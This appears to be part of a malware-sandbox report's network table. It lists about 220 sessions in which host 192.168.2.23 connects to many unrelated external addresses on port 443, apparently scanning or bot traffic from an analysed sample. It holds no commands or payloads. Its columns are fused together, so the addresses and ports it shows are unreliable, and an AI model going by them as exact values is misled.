                                          12651192.168.2.2338450182.45.119.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12652192.168.2.2353788210.216.117.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12653192.168.2.2348508175.126.234.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12654192.168.2.235075498.97.24.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12655192.168.2.2333078148.75.162.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12656192.168.2.2337952183.57.8.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12657192.168.2.235479632.126.25.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12658192.168.2.235611413.58.102.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12659192.168.2.234415059.25.156.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12660192.168.2.2337564102.102.149.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12661192.168.2.233829864.159.69.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12662192.168.2.2341856129.81.226.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12663192.168.2.2354860219.9.12.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12664192.168.2.233467284.9.41.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12665192.168.2.2335708178.157.42.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12666192.168.2.2341622145.182.20.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12667192.168.2.2350682101.234.74.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12668192.168.2.2351162161.54.41.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12669192.168.2.2357102119.120.85.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12670192.168.2.2346832116.7.167.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12671192.168.2.23392762.9.31.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12672192.168.2.2344356212.14.162.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12673192.168.2.2359790119.59.139.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12674192.168.2.2337348167.154.211.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12675192.168.2.2359516142.184.131.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12676192.168.2.234903868.149.128.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12677192.168.2.235431854.111.80.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12678192.168.2.234084864.138.231.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12679192.168.2.235296876.230.156.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12680192.168.2.235850018.139.206.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12681192.168.2.235925275.36.53.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12682192.168.2.2354058104.104.112.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12683192.168.2.2341954138.40.27.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12684192.168.2.233519699.128.70.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12685192.168.2.2360624223.255.242.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12686192.168.2.2335634152.242.140.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12687192.168.2.2359480138.49.22.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12688192.168.2.2354524138.36.149.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12689192.168.2.2355326181.22.123.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12690192.168.2.2345130212.58.164.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12691192.168.2.233959082.186.3.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12692192.168.2.2353830202.82.117.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12693192.168.2.2336054123.225.121.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12694192.168.2.2356320122.210.147.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12695192.168.2.2359438191.178.228.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12696192.168.2.234491639.55.109.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12697192.168.2.235652651.118.244.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12698192.168.2.235861824.0.147.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12699192.168.2.2356608179.243.21.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12700192.168.2.2336138174.53.228.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12701192.168.2.2357090142.171.60.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12702192.168.2.235901493.226.1.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12703192.168.2.2335406207.228.103.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12704192.168.2.2353094143.216.42.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12705192.168.2.2337096164.213.197.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12706192.168.2.2359496194.103.148.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12707192.168.2.234404886.164.144.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12708192.168.2.2356800164.106.238.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12709192.168.2.2354740147.164.217.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12710192.168.2.2333208123.167.61.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12711192.168.2.2340424169.95.157.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12712192.168.2.23596128.28.87.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12713192.168.2.2360320218.48.117.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12714192.168.2.2348296118.217.197.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12715192.168.2.2351032163.6.7.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12716192.168.2.234869088.162.201.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12717192.168.2.234911239.96.155.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12718192.168.2.2344646196.124.101.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12719192.168.2.2347686208.64.21.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12720192.168.2.234778081.168.156.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12721192.168.2.235531841.19.65.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12722192.168.2.234095045.139.75.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12723192.168.2.234604241.118.226.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12724192.168.2.2357322167.84.215.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12725192.168.2.2348696195.55.98.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12726192.168.2.2356626189.224.232.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12727192.168.2.2350594126.113.138.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12728192.168.2.2350750108.100.230.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12729192.168.2.234534219.63.160.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12730192.168.2.2344270173.18.175.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12731192.168.2.234676650.223.58.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12732192.168.2.2338620157.102.122.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12733192.168.2.233846298.213.101.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12734192.168.2.2360072108.189.251.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12735192.168.2.235229045.2.99.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12736192.168.2.234898214.201.5.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12737192.168.2.235271643.89.149.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12738192.168.2.2336272142.35.208.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12739192.168.2.2337162120.44.1.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12740192.168.2.233346894.239.1.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12741192.168.2.236032257.226.101.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12742192.168.2.2358882200.43.194.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12743192.168.2.235796669.168.141.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12744192.168.2.235879475.165.81.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12745192.168.2.2358752172.135.207.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12746192.168.2.233408054.87.5.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12747192.168.2.235090660.98.253.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12748192.168.2.234223291.100.20.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12749192.168.2.2357598161.44.70.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12750192.168.2.2343720180.210.9.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12751192.168.2.2333906108.132.84.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12752192.168.2.2335428153.129.197.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12753192.168.2.233597652.236.163.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12754192.168.2.2342792109.78.50.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12755192.168.2.2348126137.173.60.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12756192.168.2.2338646223.190.110.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12757192.168.2.2345478213.76.10.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12758192.168.2.2357270213.51.71.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12759192.168.2.235419623.45.182.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12760192.168.2.2350956180.83.163.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12761192.168.2.2348278182.51.58.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12762192.168.2.235447451.47.37.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12763192.168.2.2352268153.32.142.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12764192.168.2.2348982198.173.232.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12765192.168.2.2340564136.74.53.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12766192.168.2.2333138223.80.169.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12767192.168.2.2345226195.198.235.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12768192.168.2.235941459.151.204.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12769192.168.2.2342694134.12.185.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12770192.168.2.2342404222.153.15.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12771192.168.2.235444892.192.246.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12772192.168.2.235517446.22.190.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12773192.168.2.2353196152.85.28.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12774192.168.2.2352104103.75.56.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12775192.168.2.233767090.80.233.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12776192.168.2.235917214.186.34.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12777192.168.2.23466824.255.10.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12778192.168.2.235517253.46.66.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12779192.168.2.234520078.7.150.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12780192.168.2.2334300134.135.167.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12781192.168.2.2348432108.208.24.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12782192.168.2.2356836158.126.225.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12783192.168.2.233764882.35.207.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12784192.168.2.233360237.107.253.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12785192.168.2.2357524123.21.109.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12786192.168.2.235976265.164.178.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12787192.168.2.2360560147.148.227.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12788192.168.2.2350394129.7.135.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12789192.168.2.2356972176.56.180.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12790192.168.2.234014689.87.163.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12791192.168.2.2352324159.9.112.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12792192.168.2.2354044151.193.9.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12793192.168.2.2342392210.162.218.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12794192.168.2.2353410150.21.237.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12795192.168.2.235718879.189.214.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12796192.168.2.2350752116.59.150.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12797192.168.2.233685249.1.31.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12798192.168.2.2353584216.53.7.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12799192.168.2.2351892108.14.49.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12800192.168.2.2346344114.205.144.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12801192.168.2.2347090198.74.35.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12802192.168.2.2348984126.141.235.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12803192.168.2.234250246.163.81.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12804192.168.2.2349064118.111.159.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12805192.168.2.234459453.135.168.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12806192.168.2.2355902174.220.98.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12807192.168.2.2342748172.150.51.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12808192.168.2.2333608136.205.52.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12809192.168.2.235285627.98.146.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12810192.168.2.234458844.49.227.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12811192.168.2.2355776134.210.47.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12812192.168.2.2355178181.93.147.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12813192.168.2.234909694.81.78.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12814192.168.2.2339264181.66.227.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12815192.168.2.236032277.189.73.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12816192.168.2.2355050218.246.194.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12817192.168.2.235784857.0.181.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12818192.168.2.2360266219.103.241.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12819192.168.2.2334624156.230.163.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12820192.168.2.2351492149.81.243.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12821192.168.2.2332984137.80.91.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12822192.168.2.2342370197.46.248.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12823192.168.2.233417089.243.63.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12824192.168.2.234308697.47.83.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12825192.168.2.236099867.63.29.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12826192.168.2.2351100157.125.68.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12827192.168.2.235373870.150.33.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12828192.168.2.2355776202.9.174.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12829192.168.2.2349380186.214.204.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12830192.168.2.2351538192.10.46.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12831192.168.2.2341488101.162.67.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12832192.168.2.2332866189.160.244.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12833192.168.2.2338680119.212.48.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12834192.168.2.2359694103.151.117.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12835192.168.2.2356114212.25.177.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12836192.168.2.2346332163.36.112.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12837192.168.2.234408092.145.6.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12838192.168.2.2360430219.93.73.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12839192.168.2.2340468173.156.28.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12840192.168.2.235000031.248.42.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12841192.168.2.2348354139.238.156.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12842192.168.2.2349010146.46.166.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12843192.168.2.2334464120.46.140.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12844192.168.2.234345276.58.186.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12845192.168.2.235172858.138.54.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12846192.168.2.2349196140.61.44.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12847192.168.2.234763462.45.30.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12848192.168.2.2356322119.58.188.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12849192.168.2.234069014.143.206.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12850192.168.2.234763658.129.215.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12851192.168.2.2340870130.218.226.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12852192.168.2.2346772213.88.2.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12853192.168.2.234193281.30.147.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12854192.168.2.233939025.177.59.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12855192.168.2.2340102184.102.38.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12856192.168.2.233348076.51.3.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12857192.168.2.2358164166.3.123.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12858192.168.2.2357700130.8.144.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12859192.168.2.2350302223.124.236.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12860192.168.2.2357030148.104.149.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12861192.168.2.2344388116.140.74.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12862192.168.2.2334854114.87.24.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12863192.168.2.2340246129.170.188.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12864192.168.2.2353038124.145.29.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12865192.168.2.233983039.134.154.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12866192.168.2.234243066.57.212.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12867192.168.2.2360826196.83.36.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12868192.168.2.235384657.36.161.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12869192.168.2.2359876208.3.28.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12870192.168.2.234317452.239.105.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12871192.168.2.2343228180.136.223.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12872192.168.2.236019612.248.9.73443
                                          TimestampBytes transferredDirectionData


